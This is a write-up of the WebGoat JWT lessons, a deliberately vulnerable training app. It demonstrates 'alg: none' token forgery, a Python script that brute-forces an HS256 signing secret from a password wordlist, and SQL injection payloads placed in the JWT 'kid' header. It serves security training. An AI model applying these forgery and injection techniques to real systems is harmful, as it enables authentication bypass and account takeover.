Writeup-CTF
  • CTF events
    • DamCTF-2021
    • N1CTF 2021
    • WANNAGAME CHAMPIONSHIP2021
      • After end
    • DefCamp CTF 21-22
  • Root-me
    • SQL Injection - Filter bypass
    • GraphQL
    • JSON Web Token (JWT) - Public key
    • LDAP injection - Blind
    • Python - Blind SSTI Filters Bypass
    • SQL Injection - Filter bypass
    • SQL Truncation
    • Page 1
    • [Root-me]PHP - Unserialize overflow
  • WebGoat
    • Injection
    • XXE
    • Broken Authentication
      • JWT Token
      • Password reset
    • Sensitive Data Exposure
      • Insecure login
    • Broken Access Control
      • Insecure Direct Object References
    • Cross Site Scripting (XSS)
    • Cross site request forgery
      • Cross-Site Request Forgeries
      • Server-Side Request Forgery
    • Client site
      • Client site filtering
      • Bypass front-end restrictions
      • HTML tampering
    • Insecure Deserialization
    • Vulnerable Components
    • Challenges
      • Admin lost password
      • Without password
      • Without account
Powered by GitBook
On this page
  • 3/
  • 5/
  • 8/
  • 10/
  • 11/
  1. WebGoat
  2. Broken Authentication

JWT Token

PreviousBroken AuthenticationNextPassword reset

Last updated 3 years ago

3/

Use jwt.io to decode token, you will get username.

5/

After decode, you will see algorithm is HS256 and admin is false.

First, edit alg to "none". Next edit admin value to "true"

Edit cookie and send:

8/

eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDE1MDk3MiwiZXhwIjoxNjQwMTUxMDMyLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.dlRNogwJ7D5mrP2ZvXlG5LW1d1U-vqq4DNld1EeN-FA

First, we must to find key of this token, after that change the username field in this token to 'WebGoat' to solve this challenge (The algorithm is HS256).

I use 1000000-password-seclists.txt to brute force.

Code to find key:

import jwt
jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDEzOTY5NywiZXhwIjoxNjQwMTM5NzU3LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.1XUCWT94XEVfGV1OBGV4cLMJhqCMbzWzZI39I01Exmc'
with open('1000000-password-seclists.txt') as f:
    for line in f:
        key = line.strip()
        try:
            jwt.decode(jwt_str, key, algorithms='HS256')
            print('Key found : ',key)
            break
        except jwt.exceptions.ExpiredSignatureError:
            print('Key found : ',key)
            break
        except jwt.exceptions.InvalidSignatureError:
            continue
    else:
        print("No key found.")

I found that the key is victory, use this key to decode and change username to WebGoat:

And then when We submit we will receive message that the jwt token is expired:

Change exp value and submit token again, we will solve this challenge:

10/

This challenge is similar to challenge 5.

Go to file logs.txt, we will get token:

Modify request with Burpsuite, we will see Authorization header:

We will edit the token we got and then use it to set value for Authorization header:

The algorithm is "None":

Edit admin field to "true":

Send request with new token, we will solve the challenge:

11/

First, use jwt.io to decode:

In header, you will see "kid", It seems different from other challenges.

Take a look at source code in WebGoat's github:

Here we can see, the key will be selected from the database where id=kid. We can use SQLI to make it return your own key:

Some thing we can use like this:

' union select 'key' from INFORMATION_SCHEMA.SYSTEM_USERS; --

When the query is executed, the key use to encode jwt is 'key' (your own key).

But one more step, you can see, before use this value as a key for jwt, it must be base64 decode first:

TextCodec.BASE64.decode(rs.getString(1));

So we must edit the value for kid o to:

' union select 'a2V5' from INFORMATION_SCHEMA.SYSTEM_USERS; --

And finally, edit username to "Tom", delete exp and use 'key' as key:

Submit new token and solve the challenge: